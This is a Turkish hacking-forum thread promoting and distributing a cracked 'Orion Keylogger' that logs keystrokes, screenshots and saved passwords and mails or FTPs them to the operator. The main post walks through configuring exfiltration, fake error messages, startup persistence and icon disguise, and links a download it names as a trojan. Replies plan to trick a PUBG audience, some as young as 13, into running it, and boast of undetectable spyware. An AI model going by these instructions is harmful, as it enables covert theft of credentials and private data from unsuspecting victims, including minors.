Orion Keylogger Full Cracked (Güçlü Keylogger)

dr.web

Üye
9 Şub 2022
109
142
kanka bir pubg kitlem var orada net yedirtme bilirim tıklatırım ben bu dosyaya fakat umarım inşAllah gelir istediğim şifreler ekran görüntüleri vs <3

merakla bekliyorum
sen şeytaaannn :)
zararsız insanlara zarar vermek Lamer işidir Zararlı insanlara zarar vermek Er kişinin işidir.
selamın aleyküm bir türlü tıklamalarına rağmen gelmiyor neden ?
merhabalar gmail ayarlarınızı kontrol ettiyseniz,
ve programdan exe çıkartırken herşeyi doğru yaptıysanız,
üçüncü durum sorun, karşı tarafın adı üstünde virüs programı veya win10 defender, den kaynaklı
belli başlı çalışsa bile işlevsiz etkisiz kalma olabiliyor
kendimin bizzat yaptığı Casus yazılım olucak, üzerinde çalışmalarım sürdürüyorum (zaman pek az)
profilimde ilk deneme videosunu paylaştım %100 fudlu bir yazılım olduğundan tüm sistemleri sessiz sedasız elegeçirebilir.
Merhaba, bana pek güvenilir gelmedi açıkcası güvenilir değil mi?
antiler %1 diyor siz bilirsiniz :)
program bana ait değil tanıtım amaçlı paylaştım,
kendi yazılım daha yeni yazmaya başladım, profilimde ilk videosu var ilerde premium paylşayım yapıcam

27 Nis 2020
58
9
zararsız insanlara zarar vermek Lamer işidir Zararlı insanlara zarar vermek Er kişinin işidir.

üçüncü durum sorun, karşı tarafın adı üstünde virüs programı veya win10 defender, den kaynaklı
kendimin bizzat yaptığı Casus yazılım olucak, üzerinde çalışmalarım sürdürüyorum (zaman pek az)
profilimde ilk deneme videosunu paylaştım %100 fudlu bir yazılım olduğundan tüm sistemleri sessiz sedasız elegeçirebilir.

kendi yazılım daha yeni yazmaya başladım, profilimde ilk videosu var ilerde premium paylşayım yapıcam
kralım 13 yaşından tut 28 yaşına kadar pp lerinden görüdğüm kadarıyla bu oyunu oynayan ve hile arayanlar var ss leride e posta yolu ile geldiği için belirli bir gözetim altnda zararlı insan döngüsü altında olanların hesaplarının içine s*çmayı düşünüyorum zaten onları takip etmeyi vs :)

kral peki aklında tahmini bir zamanvarmı 1 haftaya çıkar 3 haftaya çıkar felan diyebilirmisin ?

dr.web

Üye
9 Şub 2022
109
142
kral peki aklında tahmini bir zamanvarmı 1 haftaya çıkar 3 haftaya çıkar felan diyebilirmisin ?
aslında hazır eğitim amaçlı birkaç video çekicem istediğiniz uzantıda nasıl çalışırla alakalı+ ekstra eklemem var yanına farklı bir konsept
ilk deneme videosu profil duvarımda var tanıtım için çektim

27 Nis 2020
58
9
aslında hazır eğitim amaçlı birkaç video çekicem istediğiniz uzantıda nasıl çalışırla alakalı+ ekstra eklemem var yanına farklı bir konsept
istediğimiz uzantıda olursa jpg ler ile yedirtemeyeceğimiz kimseyok g.çösdg

kral paylaşmadın değilmi henüz kaçırmayayayım diye diyorum :)

Muslukcu

Katılımcı Üye
17 Kas 2021
699
262
Tesisat dükkanı
Merhabalar
Söz verdiğim gibi Kullanışlı Güçlü Etkili Bilgi çekmesi ve ekran resim tuş kayıtları ve daha fazlsıyla
Orion Keylogger Full(Cracklenmiş :] ) haliyle sizlere Tanıtacağım.

NOT: Öncesinde Gmail hesabınızdan :
https://www.google.com/settings/security/lesssecureapps
Linke girerek daha az güvenli seçeneğini açmalısınız yoksa Mail Gelmeyebilir.
Genel görünüm ve veri almak için ister FTP ister MAİL desteği, test msj
cf7tjzj.jpg

Burada ne işaretlerseniz o mail hesabınıza gelecektir ve altta kayırlı şifreleri silmeye yarar özellik

2ylzidg.jpg

isterseniz sahte Hata mesajıda kullanabilirsiniz.
2vxyvhe.jpg

PC her açıldığında kendini oraya kopyalayarak çalıştırma özelliğide var hemde :)
29672rp.jpg

son olarak ikon ekleyebilirsiniz, ve alttaki butona tıklıyoruz keyloggermiz hazır.
cq3pnjg.jpg

Şimdi test amaçlı çift tıklıyorum ve gmail hesabıma geçiyorum
Görüldüğü gibi baya bir bilgi veri çekip yollamış
nlxinvs.jpg

tuş ve ekran resmi kayırları ve hangi dosya iseniz onuda gösteriyor baya kullanışlı anlıycanız.

4pqd6mm.jpg

Evet Orion Keylogger da anlatacağım bu kadar,
indirme linkli:Orion_Keylogger_2.1_Cracked-OficialTrojan.rar indir
virus scan:Orion_Keylogger_2.1_Cracked-OficialTrojan.rar 1% Scanner(s) (1/51) found malware! - VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 47 AntiVirus Engines!
Konuya tepkinizi, Yorumlarda Değerlendirme anlamadığınız takıldığınız yerleri yazabilirsiniz cevaplamaya çalışacağım
iyi günler.

ÖNEMLİ NOT:
Pek yakında Kendimin yazdığı geliştirdiği bir Casus yazılım hazırlıyorum
İlerleyen zamanlarda daha detaylı bilgi vereceğim.
Elinize saglik

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.